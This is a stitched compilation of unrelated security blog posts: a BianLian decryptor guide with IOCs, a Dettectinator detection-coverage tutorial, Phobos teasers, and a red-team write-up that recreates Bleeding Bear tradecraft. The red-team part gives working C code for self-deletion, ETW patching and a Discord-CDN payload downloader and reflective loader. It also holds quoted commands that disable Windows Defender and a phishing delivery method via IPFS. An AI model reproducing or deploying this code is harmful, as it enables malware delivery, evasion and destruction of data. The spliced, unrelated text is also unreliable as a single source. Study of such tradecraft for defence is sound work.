After data encryption, the ransomware appends the .bianlian extension and drops a ransom note called Look at this instruction.txt into each folder on the PC (see Figure 1).

Figure 1: Screenshot of the ransom note

When the encryption is complete, the ransomware deletes itself by executing the following command: 

cmd /c del <sample_exe_name> 

Parameters of the decryptor 

The decryptor can only restore files encrypted by a known variant of the BianLian ransomware. For new victims, it may be necessary to find the ransomware binary on the hard drive; however, because the ransomware deletes itself after encryption, it may be difficult to do so. According to Avast telemetry, common names of the BianLian ransomware file on the victim’s PC include: 

  • C:\Windows\TEMP\mativ.exe 
  • C:\Windows\Temp\Areg.exe 
  • C:\Users\%username%\Pictures\windows.exe 
  • anabolic.exe

When searching for the ransomware binary, we recommend looking for an EXE file in a folder which doesn't typically contain executables, such as %temp%, Documents or Pictures. It is also advisable to check the virus vault of your antivirus. The typical size of the BianLian ransomware executable is around 2 MB. 

Should you find a sample of the BianLian ransomware, you can inform us at [email protected]. We are actively looking for new samples and will update the decryptor accordingly. 

How to use the Avast decryption tool to decrypt files encrypted by the ransomware 

Follow these steps to decrypt your files: 

1) Download the free decryptor

2) Run the executable file. It starts as a wizard, leading you through the configuration of the decryption process.

3) On the initial page, we have a link to the license information. Click the Next button, when you are ready to start.

4) On the next page, select the list of locations you want to be searched and decrypted. By default, it contains a list of all local drives:

5) On the third page, you need to provide a file in its original form together with the same file encrypted by the BianLian ransomware. Enter both file names. You can also drag & drop a file from Windows Explorer to the wizard page.

6) If you have an encryption password created by a previous run of the decryptor, you can select the "I know the password for decrypting files" option:

7) The next page is where the password cracking process takes place. Click Start when you are ready to begin. The password cracking process tries all known BianLian passwords to determine the right one.

8) Once the password is found, you can proceed to decrypt all the encrypted files on your PC by clicking Next.

9) On the final page, you can opt-in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This option is on by default, which we recommend. After clicking Decrypt the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files. 

For questions or comments about the Avast decryptor, email [email protected].

IOCs: 

SHA256
1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43
3a2f6e614ff030804aa18cb03fcc3bc357f6226786efb4a734cbe2a3a1984b6f
46d340eaf6b78207e24b6011422f1a5b4a566e493d72365c6a1cace11c36b28b
3be5aab4031263529fe019d4db19c0c6d3eb448e0250e0cb5a7ab2324eb2224d
a201e2d6851386b10e20fbd6464e861dea75a802451954ebe66502c2301ea0ed
ae61d655793f94da0c082ce2a60f024373adf55380f78173956c5174edb43d49
eaf5e26c5e73f3db82cd07ea45e4d244ccb3ec3397ab5263a1a74add7bbcb6e2

The post Decrypted: BianLian Ransomware appeared first on Avast Threat Labs.

DeTT&CT: Automate your detection coverage with dettectinator

Introduction

Last year, I published an article on mapping detection to the MITRE ATT&CK framework using DeTT&CT. In the article, we introduced DeTT&CT and explored its features and usage. If you missed it, you can find the article here.

However, after writing that article, I encountered some challenges. For instance, I considered using DeTT&CT in a production environment, but there were hundreds of existing detection rules to consider, and it would have been a tedious process to manually create the necessary YAML file for building a detection coverage layer. As a result, I decided not to use DeTT&CT and instead focused on improving detection in other ways.
Fortunately, a new tool called Dettectinator has recently been released. Its purpose is to address these kinds of issues and make it easier to automate detection coverage.

In this article, we will explore Dettectinator, its features, and walk through the steps to automate the detection coverage for Sentinel Analytics rules and Elastic detection rules.

What is dettectinator

Dettectinator is a tool developed by Martijn Veken and Ruben Bouman of Sirius Security that enables the automation of DeTT&CT data source and technique administration YAML files needed to create visibility and detection layers in the ATT&CK Navigator. This tool can be integrated as a Python library within your security operations center (SOC) automation tools or used via the command line.

To use the Python library, install it with “pip install dettectinator” and import one of the following classes into your code:

  • DettectDataSourcesAdministration
  • DettectTechniquesAdministration

These classes allow you to programmatically edit DeTT&CT YAML files, including creating new data source and techniques administration files and modifying existing ones.

from dettectinator import DettectDataSourcesAdministration
from dettectinator import DettectTechniquesAdministration

# Open an existing YAML file:
dettect_ds = DettectDataSourcesAdministration('data_sources.yaml')

# Or create a new YAML file:
dettect_ds = DettectDataSourcesAdministration()

# Open an existing YAML file:
dettect = DettectTechniquesAdministration('techniques.yaml')

# Or create a new YAML file:
dettect = DettectTechniquesAdministration()

To run as a CLI tool:

$ python dettectinator.py

Please specify a valid data import plugin using the "-p" argument:
 - DatasourceCsv
 - DatasourceDefenderEndpoints
 - DatasourceExcel
 - DatasourceWindowsSecurityAuditing
 - DatasourceWindowsSysmon
 - TechniqueCsv
 - TechniqueDefenderAlerts
 - TechniqueDefenderIdentityRules
 - TechniqueElasticSecurityRules
 - TechniqueExcel
 - TechniqueSentinelAlertRules
 - TechniqueSigmaRules
 - TechniqueSplunkConfigSearches
 - TechniqueSuricataRules
 - TechniqueSuricataRulesSummarized
 - TechniqueTaniumSignals
$ python3 dettectinator.py -p TechniqueElasticSecurityRules -h

Plugin "TechniqueElasticSecurityRules" has been found.
usage: dettectinator.py [-h] [-c CONFIG] -p PLUGIN -a APPLICABLE_TO [-d {enterprise,ics,mobile}] [-i INPUT_FILE] [-o OUTPUT_FILE] [-n NAME] [-s STIX_LOCATION] [-ch] [-cl] [-ri RE_INCLUDE] [-re RE_EXCLUDE]
                        [-l LOCATION_PREFIX] [-clp] --host HOST --user USER --password PASSWORD [--filter FILTER]

Dettectinator provides a range of plugins for various detection systems and data source platforms, and you can even create custom plugins to suit your specific workflow. Some of the available plugins for detection include:

  • Microsoft Sentinel: Analytics Rules (API)
  • Microsoft Defender: Alerts (API)
  • Microsoft Defender for Identity: Detection Rules (loaded from MS Github)
  • Tanium: Signals (API)
  • Elastic Security: Rules (API)
  • Suricata: rules (file)
  • Suricata: rules summarized (file)
  • Sigma: rules (folder with YAML files)
  • Splunk: saved searches config (file)
  • CSV: any csv with detections and ATT&CK technique ID’s (file)
  • Excel: any Excel file with detections and ATT&CK technique ID’s (file)

Plugins for data sources include:

  • Defender for Endpoints: tables available in Advanced Hunting (based on OSSEM)
  • Windows Sysmon: event logging based on Sysmon (based on OSSEM and your Sysmon config file)
  • Sentinel Window Security Auditing: event logging (based on OSSEM and EventID’s found in your logging)
  • CSV: any csv with ATT&CK data sources and products (file)
  • Excel: any Excel file with ATT&CK data sources and products (file)

It’s easy to create your own Dettectinator plugins or edit the ones provided to cover additional scenarios. An instruction on how to create your own plugins can be found here.

Dettectinator can be seamlessly integrated into your detection engineering workflow, as illustrated in the picture below. Steps 1 and 3 can be automated using version control system (VCS) pipelines or scheduling. The analyst can enhance the techniques identified by Dettectinator by assigning appropriate scores, resulting in an enriched YAML file that can be used in future runs of the tool.

Dettectinator workflow
Figure 1: Dettectinator workflow

How to use dettectinator

To illustrate how to use Dettectinator from a production environment, we will walk through the steps to build your coverage from Elastic Security detection rules and Microsoft Sentinel analytics rules.

Let’s start with Elastic Security. As shown in the picture below, we enabled the built-in detection rules from Elastic which represent 724 rules in total.

Elastic Security detection rules
Figure 2: Elastic Security detection rules

Ensure that the Elastic user has the appropriate permissions to manage/read the detection rules. Refer to the Elastic documentation for more information.

In our testing environment, we created a dedicated user and assigned it a custom role (as shown in the highlighted parameters):

Elastic detection permissions role
Figure 3: Elastic detection permissions role

With the command below, we will generate the technique administration YAML file which we will use to create the ATT&CK Navigator layer:

$ python3 dettectinator.py -p TechniqueElasticSecurityRules -a Windows -d enterprise -o elasticrules_techniques.yaml --host "<URL>:<Port>" --user <username> --password <password>
  • -p: specify the plugin
  • -a: systems that the detections are applicable to (comma-separated list)
  • -d: ATT&CK domain to use {enterprise, ics, mobile} (default = enterprise)
  • -o: YAML filename for output
  • --host: Elastic Security host
  • --user: Elastic Security username
  • --password: Elastic Security user's password
Dettectinator Elastic Security Rules plugin
Figure 4: Dettectinator Elastic Security Rules plugin

Using the DeTT&CT Editor, we were able to modify the technique administration YAML file. Alternatively, we could use the output to generate a detection ATT&CK Navigator layer through the DeTT&CT Command Line Interface (CLI).

DeTT&CT Editor
Figure 5: DeTT&CT Editor

To generate the detection layer, we used the following command:

$ python3 dettect.py d -ft <YAML file generated by dettectinator> -l
  • d: detection coverage mapping based on techniques
  • -ft: path of the technique administration YAML file
  • -l: generate a layer file for the ATT&CK Navigator

The tool dettect.py generated a JSON file that can be opened within ATT&CK Navigator.

In this case, we get a quick overview of the built-in Elastic Security detection rules. All techniques are assigned a default score of ‘1’ by dettectinator. This scoring can be customized using the DeTT&CT Editor.

Detection coverage layer
Figure 6: Detection coverage layer

When hovering over the ATT&CK techniques and sub-techniques, additional information such as related detection rules and comments generated by dettectinator will appear.

Here is an example for the technique Lateral Tool Transfer (T1570):

Detection layer - details
Figure 7: Detection layer – details

Now, let’s check the detection coverage from an existing Microsoft Sentinel environment with Analytics rules.  In our testing example, we created an “App Registration” in Azure and granted it the following permissions:

App Registration permissions
Figure 8: App Registration permissions

Since we are using delegated permissions, we also had to enable “Allow public client flows” in the Authentication settings for the App Registration.

To generate the technique administration YAML for Microsoft Sentinel, we used the following command:

$ python3 dettectinator.py -p TechniqueSentinelAlertRules -a Windows -o sentinel_techniques.yaml --subscription_id <subscription_id> --resource_group <resource group name> --workspace <workspace name> --tenant_id <tenant_id> --app_id <app_id>
Dettectinator - Microsoft Sentinel Techniques
Figure 9: Dettectinator – Microsoft Sentinel Techniques

Dettectinator generated a YAML file containing information about a single technique. As shown in the picture below, our test Microsoft Sentinel environment contains 5 analytics rules, but only one of them has a technique specified in its metadata. As a result, Dettectinator was able to map the analytics rules to only one technique (T1190).

Microsoft Sentinel Analytics Rules
Figure 10: Microsoft Sentinel Analytics Rules
Microsoft Sentinel detection coverage
Figure 11: Microsoft Sentinel detection coverage

Conclusion

Dettectinator is a highly efficient tool that can help you optimize your detection engineering processes. By automating certain tasks, it frees up your time and resources to focus on more complex, high-level tasks.

When used in conjunction with DeTT&CT, it provides a real-time overview of your current detection coverage, giving you a clear understanding of your strengths and areas for improvement. Additionally, Dettectinator comes equipped with a range of integrations that are suitable for a variety of environments, making it a versatile and efficient tool.

In addition to its automation capabilities, Dettectinator is also highly customizable. It allows you to tailor its functionality to meet the specific needs of your organization or project.

One of the key benefits of using Dettectinator is its ability to save users a considerable amount of time. It complements DeTT&CT by addressing some of the challenges that users may face, making it an invaluable addition to any detection engineering workflow. In short, if you’re looking to streamline your detection processes and improve your coverage, Dettectinator is an excellent tool to consider.

References

“Dettectinator”, https://github.com/siriussecurity/dettectinator

“Releasing Dettectinator”, https://www.siriussecurity.nl/blog/2022/11/03/releasing-dettectinator

“DeTT&CT : Mapping detection to MITRE ATT&CK”, https://blog.nviso.eu/2022/03/09/dettct-mapping-detection-to-mitre-attck/

“rabobank-cdc/DeTTECT: Detect Tactics, Techniques & Combat Threats”, https://github.com/rabobank-cdc/DeTTECT

“ATT&CK® Navigator“, https://mitre-attack.github.io/attack-navigator/

About the author

Renaud Frère
Renaud Frère

Renaud is an Incident Response Consultant within the CSIRT team at NVISO with a focus on digital forensics including mobile device forensics. He is also involved in various projects related to Threat Hunting, Detection Engineering and Threat Intelligence. Occasionally, Renaud likes to participate in DFIR CTFs and Netwars.

Advanced Phobia

By: Ylabs
Reading Time: 8 minutes Ransomware Gang Details Phobos ransomware, first discovered in December 2018, is another notorious cyber threat actor which targets businesses. Phobos is popular among threat actors because of its simple design. In addition, the Greek god Phobos was thought to be the incarnation of fear and panic: the gang’s name was likely inspired by him. Phobos […]

Phobia

By: Ylabs
Reading Time: 9 minutes Ransomware Details Phobos ransomware, first discovered in December 2018, is another notorious cyber threat that targets businesses. Phobos is popular among threat actors of various technical abilities because of its simple design. In addition, the Greek god Phobos was thought to be the incarnation of fear and panic; hence the name Phobos was likely inspired […]

Repurposing Real TTPs for use on Red Team Engagements

I recently read an interesting article by Elastic. It provides new analysis of a sophisticated, targeted campaign against several organizations, which has been labelled 'Bleeding Bear'. The article's analysis of Bleeding Bear tactics, techniques and procedures left me with a couple of thoughts. The first was, "hey, I can probably perform some of these techniques!" and the second was, "how can I improve on them?"

With that in mind, I decided to create a proof of concept for elements of Operation Bleeding Bear TTPs. This is not an exact replica, or even an attempt to be an exact replica, because I found a lot of the actions the threat actors were performing were unnecessary for my objectives. I dub this altered set of techniques BreadBear.

Where there are changes, I'll point them out along with the reasons for them. To help you follow along with this blog post, I have posted the code to my GitHub repository, which you are welcome to download, examine, and run. This post is separated into three distinct sections, one for each stage of the campaign: initial payload delivery, payload execution, and finally document encryption.

Stage 1 – Initial Payload and Delivery

The first section of the Bleeding Bear campaign is described as a WhisperGate MBR wiper. Essentially, this technique will make any machine affected unbootable on the next boot operation. The attackers replace the contents of the MBR with a message that usually says something along the lines of “To get your data back, send crypto currency to xyz address”. I didn’t implement this because it’s a proof of concept and I didn’t want to wreck my development VM 100 times to test this out.

Instead, I created a stage 1 as a fake phishing scenario to be the initial delivery of the payload. The payload itself is delivered via a static webpage that upon loading will execute JavaScript to automatically download the stage 2 payload. However, it’s up to the end user to click past a few different warnings to run the executable. I’d like to mention that initial payload delivery is probably my weakest point in all of this, so if you’re reading this and can think of a million ways to improve upon this technique, please reach out to me on twitter or LinkedIn with recommendations.

The initial payload delivery is facilitated by a static web page with some JavaScript that has the user automatically download the targeted file upon loading of the page. The webpage itself is hosted by IPFS (the Inter-Planetary File System). Once you have IPFS installed on your system, all you need to do is import your web page's root folder to IPFS and retrieve the URL to your files. This process is very simple and looks as follows.

Once IPFS is installed, first hit Import, then Folder.

Next, when the browser window opens, you’ll want to browse to your static webpages root folder. A sample provided by Black Hills Information Security is included in the GitHub repo under x64/release. With tools like zphisher you can create your own, more complex, phishing sites.

Once your folder has been imported, your files will be shared via the IPFS peer-to-peer network. Additionally, they will be reachable from a common gateway that you can set in your IPFS settings. IPFS has a list of gateways that can be used, located on this site. However, to retrieve the URL that can access your files you’ll want to right click on the folder, click share link, and then copy.

Then, all you need to do is distribute this link with the proper context for your target. When the user clicks your link, they’ll be presented with the following page:

(Screenshot: the browser download warning presented to the user.)

On Chrome, if they press keep, the file finishes the download and is ready for execution. The JavaScript code that performs the automatic download to force Chrome to ask to keep the file is shown below:

(Screenshot: the JavaScript snippet that triggers the automatic download.)

An element variable is initialized to the download href tag. Then, we set the element to our executable file named MicrosoftUpdater.exe. Finally, we click the element programmatically, which starts the download process. For more information about how IPFS can be used as a malware hosting service, read this blog by Steve Borosh, who inspired the initial payload delivery.

Stage 2 – Payload Execution

Once the user has been successfully phished, phase 1 has been completed and we transition into phase 2, with the execution of stage2.exe or, in this case, the MicrosoftUpdater.exe program. In the Bleeding Bear campaign, the heavy lifting is performed by the stage2.exe binary, which uses Discord to download and execute malicious programs. My stage 2 binary also utilizes the Discord CDN to download, reflectively load, and execute stage 3. However, that’s pretty much where the comparison stops.

The stage 2 Discord downloader in the Bleeding Bear campaign downloads an obfuscated .NET assembly and uses reflection to load it. However, mine is a compiled PE binary. Additionally, the Bleeding Bear campaign performs a lot of operations which require either a UAC bypass or a UAC accept from the user to perform. These actions include writing a VBScript payload to disk which will set a Defender exclusion path on the C drive.
"C:\Windows\System32\WScript.exe""C:\Users\jim\AppData\Local\Temp\Nmddfrqqrbyjeygggda.vbs"
powershell.exe Set-MpPreference -ExclusionPath 'C:\'

Then the payload will download and run AdvancedRun at a higher integrity level to stop Windows Defender and delete all files in the Windows Defender directory.

"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" `
/WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" `
/EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 `
/CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" `
/StartDirectory "" /RunAs 8 /Run

Next, InstallUtil.exe is downloaded to the user's Temp directory. The InstallUtil program is used for process hollowing. This means that the executable is started in a suspended state, then the memory of the process is overwritten with a malicious payload, which is executed instead. To the computer it will look like InstallUtil is running; however, it is actually the payload. In the Bleeding Bear campaign, that malicious payload happens to be a file corruptor, which overwrites 1 MB of each file with the byte 0xCC for all files that end with the following extensions:

.3DM .3DS .602 .7Z .ACCDB .AI .ARC .ASC .ASM .ASP .ASPX .BACKUP .BAK .BAT .BMP .BRD .BZ .BZ2 .C .CGM .CLASS .CMD .CONFIG .CPP .CRT .CS .CSR .CSV .DB .DBF .DCH .DER .DIF .DIP .DJVU.SH .DOC .DOCB .DOCM .DOCX .DOT .DOTM .DOTX .DWG .EDB .EML .FRM .GIF .GO .GZ .H .HDD .HTM .HTML .HWP .IBD .INC .INI .ISO .JAR .JAVA .JPEG .JPG .JS .JSP .KDBX .KEY .LAY .LAY6 .LDF .LOG .MAX .MDB .MDF .MML .MSG .MYD .MYI .NEF .NVRAM .ODB .ODG .ODP .ODS .ODT .OGG .ONETOC2 .OST .OTG .OTP .OTS .OTT .P12 .PAQ .PAS .PDF .PEM .PFX .PHP .PHP3 .PHP4 .PHP5 .PHP6 .PHP7 .PHPS .PHTML .PL .PNG .POT .POTM .POTX .PPAM .PPK .PPS .PPSM .PPSX .PPT .PPTM .PPTX .PS1 .PSD .PST .PY .RAR .RAW .RB .RTF .SAV .SCH .SHTML .SLDM .SLDX .SLK .SLN .SNT .SQ3 .SQL .SQLITE3 .SQLITEDB .STC .STD .STI .STW .SUO .SVG .SXC .SXD .SXI .SXM .SXW .TAR .TBK .TGZ .TIF .TIFF .TXT .UOP .UOT .VB .VBS .VCD .VDI .VHD .VMDK .VMEM .VMSD .VMSN .VMSS .VMTM .VMTX .VMX .VMXF .VSD .VSDX .VSWP .WAR .WB2 .WK1 .WKS .XHTML .XLC .XLM .XLS .XLSB .XLSM .XLSX .XLT .XLTM .XLTX .XLW .YML .ZIP

I found a lot of these steps to be unnecessary; therefore, I did not perform them. I wanted to leave as little trace on the system as possible. I also didn't see a need for a high integrity process to be spawned to perform ancillary functions, such as deleting Windows Defender, when we can just bypass it. However, my stage 2 code does contain a failed UAC bypass even though it is not used.

The differences between my stage 2/3 will become apparent as we walk through the code. Before we do that, I'd like to mention the features of my stage 2 so that the auxiliary function names you will see throughout the code make sense. My stage 2 does the following:

  • Dynamically retrieves function pointers to any Windows APIs used maliciously
    • Has a custom GetProcAddress() & GetModuleHandle() implementation to retrieve function calls
    • Custom LoadLibrary() function that will dynamically retrieve the pointer to LoadLibraryW() at each run.
  • Hides the console window at startup.
  • Has a self-delete function which will delete the file on disk at runtime once the PE has been loaded into memory and executed.
  • Unhooks DLLs using the system calls for native Windows APIs (using the Halo's Gate technique).
  • Disables Event Tracing for Windows (ETW).
  • Uses a simple XOR decrypt function to decrypt strings such as Discord CDN URLs at runtime.
  • Performs a web request to the Discord CDN using Windows APIs to retrieve stage 3 in a base64-encoded format.
  • Reflectively loads the stage 3 payload in memory and executes it.
  • Lazy attempts at string obfuscation.

With that said, I will only cover techniques I found particularly interesting or important in this blog post for brevity.

First, we see a dynamically resolved ShowWindow() used to hide the window. Next, we see SelfDelete(), which deletes the file from disk even while the executable is still running. I believe this function is a neat trick and worth going over.

First, we dynamically resolve pointers to the Windows APIs CloseHandle(), SetFileInformationByHandle(), CreateFileW(), and GetModuleFileNameW(). Following that we create some variables to store necessary information.

Next, we resolve the path where our stage 2 was written to disk using GetModuleFileNameW(). We then obtain a handle to stage 2 using CreateFileW() with the OPEN_EXISTING flag. We create a FILE_RENAME_INFO structure and populate it with the rename string ":breadman" and a flag to replace the file if it already exists. We then call SetFileInformationByHandle() with our file handle, our rename information structure, and the FileRenameInfo information class. Renaming the file handle is what allows us to delete the file on disk, because the file lock now applies to the renamed stream. We can then reopen a handle to the original file on disk and delete it: we close our handle, reopen it using the original file path, and call SetFileInformationByHandle() again with a FILE_DISPOSITION_INFO structure whose DeleteFile member is set to TRUE. Finally, we close the file handle, which causes the file to be deleted from disk, and we continue our code execution back in main(). A compact sketch of the trick follows.
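
Below is a minimal C sketch of this rename-then-delete trick, using direct API calls instead of the dynamically resolved pointers described above; the ":breadman" stream name mirrors the write-up and error handling is trimmed for brevity.

#include <windows.h>
#include <stdlib.h>
#include <string.h>

/* Minimal sketch of the self-delete trick described above. */
static BOOL self_delete(void)
{
    WCHAR path[MAX_PATH];
    const WCHAR newStream[] = L":breadman";

    if (!GetModuleFileNameW(NULL, path, MAX_PATH))
        return FALSE;

    /* 1) Rename the primary data stream of our own file. */
    SIZE_T size = sizeof(FILE_RENAME_INFO) + sizeof(newStream);
    FILE_RENAME_INFO *ri = (FILE_RENAME_INFO *)calloc(1, size);
    if (!ri) return FALSE;
    ri->ReplaceIfExists = TRUE;
    ri->FileNameLength = sizeof(newStream) - sizeof(WCHAR);
    memcpy(ri->FileName, newStream, sizeof(newStream));

    HANDLE h = CreateFileW(path, DELETE | SYNCHRONIZE, 0, NULL, OPEN_EXISTING,
                           FILE_ATTRIBUTE_NORMAL, NULL);
    if (h == INVALID_HANDLE_VALUE) { free(ri); return FALSE; }
    BOOL ok = SetFileInformationByHandle(h, FileRenameInfo, ri, (DWORD)size);
    CloseHandle(h);
    free(ri);
    if (!ok) return FALSE;

    /* 2) Reopen the original path and mark it for deletion on close. */
    h = CreateFileW(path, DELETE | SYNCHRONIZE, 0, NULL, OPEN_EXISTING,
                    FILE_ATTRIBUTE_NORMAL, NULL);
    if (h == INVALID_HANDLE_VALUE) return FALSE;
    FILE_DISPOSITION_INFO di = { TRUE };  /* DeleteFile = TRUE */
    ok = SetFileInformationByHandle(h, FileDispositionInfo, &di, sizeof(di));
    CloseHandle(h);  /* the file is unlinked when this handle closes */
    return ok;
}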

With that done, we perform the unhooking of our DLLs using system calls and native APIs to bypass AV/EDR hooking. I won't cover this in depth; however, the exact same code is used in another of my blog posts.

The next important functions in main() disable Event Tracing for Windows (ETW) and decrypt the encrypted Discord CDN strings.

The disabling of Event Tracing for Windows is simple (function template credits to the Sektor7 institute):

(Screenshot: the ETW patch function.)

First, we obtain a handle to the EventWrite() function in the NTDLL.dll library. Then we change the memory protection of a single page to execute+read+write and copy the byte equivalent of xor rax, rax; ret over the first four bytes of the function. This sets the function's return value to zero (indicating success) and returns immediately, so the function no longer performs any action, which disables Event Tracing for Windows. A hedged sketch of the patch follows.
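
A compact C sketch of such a patch is shown below. It assumes the commonly patched ntdll export EtwEventWrite (the write-up refers to the target simply as EventWrite) and applies to x64 only.

#include <windows.h>
#include <string.h>

/* Sketch of the ETW patch described above: overwrite the first bytes of the
 * ntdll event-write routine with "xor rax, rax; ret" (48 31 C0 C3) so it
 * returns success without logging anything. EtwEventWrite is an assumption
 * here; the write-up calls the target "EventWrite". */
static BOOL patch_etw(void)
{
    unsigned char patch[] = { 0x48, 0x31, 0xC0, 0xC3 };
    DWORD oldProt = 0;

    void *target = (void *)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                          "EtwEventWrite");
    if (!target)
        return FALSE;

    if (!VirtualProtect(target, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProt))
        return FALSE;

    memcpy(target, patch, sizeof(patch));
    VirtualProtect(target, sizeof(patch), oldProt, &oldProt);
    FlushInstructionCache(GetCurrentProcess(), target, sizeof(patch));
    return TRUE;
}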

I won't go over the XOR decryption since it's a rudimentary technique. However, I will go over how you can use the Discord CDN as an MDN, a 'Malware Distribution Network'.

In Discord, anyone can create their own private server and upload files, messages, pictures, etc. to it. However, access to anything uploaded, even to a private server, does not require authentication. One caveat to keep in mind is that executables need to be converted to a base64 string: when I uploaded raw executables, I ran into problems (likely compression) where the file downloaded via the APIs was smaller than the one downloaded manually from the CDN. The same problem did not occur with text files. Therefore, I put the base64-encoded PE file into a text file and downloaded that instead. This looks like the following:

(Screenshot: the base64-encoded payload uploaded as a text file to a Discord channel.)

Once you’ve uploaded the file, you can right click the download link at the bottom of the above screenshot, then select Copy Link.

Once that has been completed, you have your Discord CDN URL that is accessible from anywhere in the world without authentication. Additionally, these URLs are valid forever even if the file has been deleted from the server.

It's as simple as that. Obviously, there might be some red team infrastructure you'd want to stand up between the CDN and the target host to redirect any potential security analysts who go snooping, but it's an effective method for serving up malware.

Next, to finish up main(), we perform the following tasks. We first parse our Discord CDN URL that was just decrypted into separate parts. Then we perform a request to download our targeted file by calling the do_request() function using the parsed URL pieces.

We open the do_request() function by dynamically resolving pointers to any Windows APIs we will use to perform the HTTPS request to Discord. We then follow that up by initializing variables we’re going to use as parameters to the following WinInet function calls.

There aren’t too many interesting pieces of information regarding our Internet API calls, aside from the InternetOpenA() and the HttpOpenRequestA() calls. For the first, we specify INTERNET_OPEN_TYPE_DIRECT to ensure that there is no proxy. We can put default options here to specify the default system proxy settings. Additionally, for HttpOpenRequestA() we specify the INTERNET_FLAG_NO_CACHE_WRITE flag to ensure the call doesn’t cache the file download in the %LocalAppData%\Microsoft\Windows\INetCache. Next, we make a call to HttpQueryInfoA() with the HTTP_QUERY_CUSTOM flag. This ensures that we can receive the value of a custom HTTP Response header that we got back when we made our HTTP request. The specified custom query header is passed to do_request() from main and is the content length header. We will use this value to allocate memory for our stage 3 payload that was just downloaded.

We now allocate memory for our downloaded file using malloc() and the size of our content length value. Following that, we call the InternetReadFile() function to load the base64-encoded data into our allocated memory space. Once it has been successfully loaded, we make a call to pCryptStringToBinaryW(), which converts our base64-encoded data into the byte code that makes up our stage 3 payload. We then free the allocated memory region and call the final function of do_request(), which is reflectiveLoader(). A condensed sketch of this download-and-decode flow is shown below.
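
The following is a condensed C sketch of a do_request()-style download, not the actual BreadBear code: the host and path parameters are placeholders, the WinInet and crypt32 imports are linked statically rather than resolved dynamically, and the standard Content-Length query is used instead of the custom header query described above.

#include <windows.h>
#include <wininet.h>
#include <wincrypt.h>
#include <stdlib.h>

#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "crypt32.lib")

/* Download a base64-encoded payload over HTTPS and decode it to raw bytes.
 * Returns a malloc'd buffer (caller frees) or NULL on failure. */
static BYTE *fetch_and_decode(const char *host, const char *path, DWORD *outLen)
{
    BYTE *pe = NULL;
    char *b64 = NULL;

    HINTERNET hNet = InternetOpenA("Mozilla/5.0", INTERNET_OPEN_TYPE_DIRECT,
                                   NULL, NULL, 0);
    HINTERNET hCon = InternetConnectA(hNet, host, INTERNET_DEFAULT_HTTPS_PORT,
                                      NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    HINTERNET hReq = HttpOpenRequestA(hCon, "GET", path, NULL, NULL, NULL,
                                      INTERNET_FLAG_SECURE |
                                      INTERNET_FLAG_NO_CACHE_WRITE, 0);
    if (!hReq || !HttpSendRequestA(hReq, NULL, 0, NULL, 0))
        goto done;

    /* Size the buffer from the Content-Length response header. */
    DWORD contentLen = 0, cb = sizeof(contentLen), bytesRead = 0;
    if (!HttpQueryInfoA(hReq, HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
                        &contentLen, &cb, NULL) || contentLen == 0)
        goto done;

    b64 = (char *)malloc(contentLen);
    if (!b64 || !InternetReadFile(hReq, b64, contentLen, &bytesRead))
        goto done;

    /* Base64 text -> raw PE bytes. The first call only sizes the output. */
    if (!CryptStringToBinaryA(b64, bytesRead, CRYPT_STRING_BASE64, NULL, outLen, NULL, NULL))
        goto done;
    pe = (BYTE *)malloc(*outLen);
    if (pe && !CryptStringToBinaryA(b64, bytesRead, CRYPT_STRING_BASE64, pe, outLen, NULL, NULL)) {
        free(pe);
        pe = NULL;
    }

done:
    free(b64);
    if (hReq) InternetCloseHandle(hReq);
    if (hCon) InternetCloseHandle(hCon);
    if (hNet) InternetCloseHandle(hNet);
    return pe;
}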

I won’t go over the reflective loading / execution of our PE File in memory because I’ve written a previous blog post about it already. However, I used the code from this resource as the base of my loader.

Stage 3 – File Corruptor

Stage 3 probably has the biggest differences in functionality from the Bleeding Bear campaign. The stage 3 of the Bleeding Bear campaign is a "File Corruptor", not an encryption scheme. What this means is that the Bleeding Bear campaign's third stage will overwrite the first 1 MB of data of all files it finds on disk that are not critical to system operation. If the file is smaller than 1 MB, it will overwrite the whole file and pad the difference to make a 1 MB file. As far as I know, the campaign does not copy the unaffected files anywhere before overwriting, therefore all data will be lost. This file corruptor is also not a reflectively loaded PE file. Instead, the file corruptor is likely a piece of shellcode that is executed via a process hollowing technique. The stage 2 of the Bleeding Bear campaign downloads InstallUtil.exe to disk, executes it in a suspended state, overwrites the process memory with the corruptor shellcode, and then resumes the process execution.

The BreadBear technique uses a file encryptor rather than a corruptor. I decided to use an encryptor because eventually I plan to add the functionality of downloading the unencrypted data and the keys used to encrypt each file, and to add a decryption function. I believe this would be beneficial to clients who want to test against a simulated ransomware campaign. Additionally, since I am reflectively loading the stage 3 executable in memory, there's no need to perform process hollowing, or even to write the InstallUtil binary to disk. I believe my approach is more operationally secure than Bleeding Bear's alternative.

Additionally, with my approach you can swap out your stage 3 from file encryptor to implant shellcode. I have successfully tested my stage 3 payload with the binary from my previous blog post BreadMan Module Stomping. The only requirement for the reflective loading is that the file chosen is compiled in a valid PE format.

With that being said, let’s dive into stage 3: the file encryptor.

I would like to note that no attempts at obfuscation or evasion were made in the stage 3 payload. This is because it is loaded into a process memory space that has already been unhooked from AV/EDR, and ETW patching has already occurred, so it is not needed.

In main(), all we do is call the encryptDirectory() function with our target directory as the argument. Note that, since this is a proof of concept, I did not implement functionality to encrypt entire drives.

encryptDirectory() starts by initializing a variable to hold a new directory path, called tmpDirectory. We append "\\*" to our target directory, which indicates that we want to retrieve all files. Then, we initialize a WIN32_FIND_DATAW and a file handle variable.

Next, we call FindFirstFileW() using the target directory and our FIND_DATAW variables as parameters. Then, we create a linked list of directories.

